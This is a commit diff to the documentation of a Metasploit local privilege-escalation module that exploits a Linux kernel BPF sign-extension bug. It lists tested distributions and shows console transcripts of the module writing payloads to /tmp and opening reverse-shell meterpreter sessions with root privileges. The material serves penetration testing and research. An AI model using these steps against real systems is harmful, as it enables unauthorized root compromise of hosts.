Fix bpf_sign_extension_priv_esc
This commit is contained in:
Brendan Coles
@@ -1,20 +1,29 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits the Berkeley Packet Filter in the Linux kernel prior to 4.13.0,
|
||||
which contains a vulnerability where it may improperly perform sign extentension.
|
||||
This can be utilized to priv escalate. However, this module's offsets and
|
||||
other parameters have only been set and tested against the 4.4.0-116 kernel.
|
||||
Linux kernel prior to 4.14.8 utilizes the Berkeley Packet Filter (BPF)
|
||||
which contains a vulnerability where it may improperly perform sign
|
||||
extension. This can be utilized to escalate privileges.
|
||||
|
||||
This module has been successfully tested on:
|
||||
The target system must be compiled with BPF support and must not have
|
||||
`kernel.unprivileged_bpf_disabled` set to `1`.
|
||||
|
||||
* Ubuntu 16.04 with the 4.4.0-116 kernel
|
||||
* Linux Mint 18 with the 4.4.0-116-generic kernel
|
||||
This module has been tested successfully on:
|
||||
|
||||
### Meterpreter Exception
|
||||
|
||||
Due to a bug, this exploit can only be run on a non-meterpreter shell.
|
||||
When run on meterpreter, or a shell spawned by meterpreter, the error `error: Invalid argument`
|
||||
is thrown by the executable.
|
||||
* Debian 9.0 kernel 4.9.0-3-amd64;
|
||||
* Deepin 15.5 kernel 4.9.0-deepin13-amd64;
|
||||
* ElementaryOS 0.4.1 kernel 4.8.0-52-generic;
|
||||
* Fedora 25 kernel 4.8.6-300.fc25.x86_64;
|
||||
* Fedora 26 kernel 4.11.8-300.fc26.x86_64;
|
||||
* Fedora 27 kernel 4.13.9-300.fc27.x86_64;
|
||||
* Linux Mint 17.3 kernel 4.4.0-89-generic;
|
||||
* Linux Mint 18.0 kernel 4.8.0-58-generic;
|
||||
* Linux Mint 18.3 kernel 4.13.0-16-generic;
|
||||
* Mageia 6 kernel 4.9.35-desktop-1.mga6;
|
||||
* Ubuntu 14.04.1 kernel 4.4.0-89-generic;
|
||||
* Ubuntu 16.04.2 kernel 4.8.0-45-generic;
|
||||
* Ubuntu 16.04.3 kernel 4.10.0-28-generic;
|
||||
* Ubuntu 17.04 kernel 4.10.0-19-generic;
|
||||
* ZorinOS 12.1 kernel 4.8.0-39-generic.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
@@ -145,55 +154,31 @@ It is possible to force pre-compiled binaries, in a scenario where `build-essent
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
```
|
||||
### Linux Mint 18
|
||||
|
||||
### Debian 9.0 (x86_64)
|
||||
|
||||
```
|
||||
msf5 exploit(multi/handler) > use exploit/linux/local/bpf_sign_extension_priv_esc
|
||||
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set verbose true
|
||||
verbose => true
|
||||
msf5 > use exploit/linux/local/bpf_sign_extension_priv_esc
|
||||
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set session 1
|
||||
session => 1
|
||||
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > check
|
||||
|
||||
[!] SESSION may not be compatible with this module.
|
||||
[+] Kernel confirmed vulnerable
|
||||
[*] The target appears to be vulnerable.
|
||||
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set lhost 172.16.191.188
|
||||
lhost => 172.16.191.188
|
||||
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > set compile False
|
||||
compile => False
|
||||
msf5 exploit(linux/local/bpf_sign_extension_priv_esc) > run
|
||||
|
||||
[!] SESSION may not be compatible with this module.
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.191.188:4444
|
||||
[+] Kernel confirmed vulnerable
|
||||
[+] gcc is installed
|
||||
[*] Live compiling exploit on system
|
||||
[*] Writing files to target
|
||||
[*] Writing UVQYvBTJ to /tmp/UVQYvBTJ.c
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 7773 bytes in 1 chunks of 26765 bytes (octal-encoded), using printf
|
||||
[*] Writing ljJApCaK to /tmp/ljJApCaK
|
||||
[*] Max line length is 65537
|
||||
[*] Writing 283 bytes in 1 chunks of 845 bytes (octal-encoded), using printf
|
||||
[*] Starting execution of priv esc.
|
||||
[*] Transmitting intermediate stager...(126 bytes)
|
||||
[*] Sending stage (812100 bytes) to 172.16.191.207
|
||||
[*] task_struct = ffff88003ce84600
|
||||
[*] uidptr = ffff88003cc46f04
|
||||
[*] spawning root shell
|
||||
[*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.207:48276) at 2018-03-24 22:46:58 -0400
|
||||
[+] Deleted /tmp/UVQYvBTJ.c
|
||||
[+] Deleted /tmp/UVQYvBTJ
|
||||
[+] Deleted /tmp/ljJApCaK
|
||||
[!] This exploit may require manual cleanup of '/tmp/UVQYvBTJ.c' on the target
|
||||
[!] This exploit may require manual cleanup of '/tmp/UVQYvBTJ' on the target
|
||||
[!] This exploit may require manual cleanup of '/tmp/ljJApCaK' on the target
|
||||
|
||||
[*] Writing '/tmp/.JBJBxoEO' (34784 bytes) ...
|
||||
[*] Writing '/tmp/.1pZhL1gc' (207 bytes) ...
|
||||
[*] Launching exploit ...
|
||||
[*] Sending stage (861480 bytes) to 172.16.191.236
|
||||
[*] Cleaning up /tmp/.1pZhL1gc and /tmp/.JBJBxoEO ...
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0
|
||||
meterpreter > sysinfo
|
||||
Computer : 172.16.191.207
|
||||
OS : LinuxMint 18 (Linux 4.4.0-116-generic)
|
||||
Computer : debian-9-0-x64.local
|
||||
OS : Debian 9.4 (Linux 4.9.0-3-amd64)
|
||||
Architecture : x64
|
||||
BuildTuple : x86_64-linux-musl
|
||||
Meterpreter : x64/linux
|
||||
BuildTuple : i486-linux-musl
|
||||
Meterpreter : x86/linux
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
Reference in New Issue
Block a user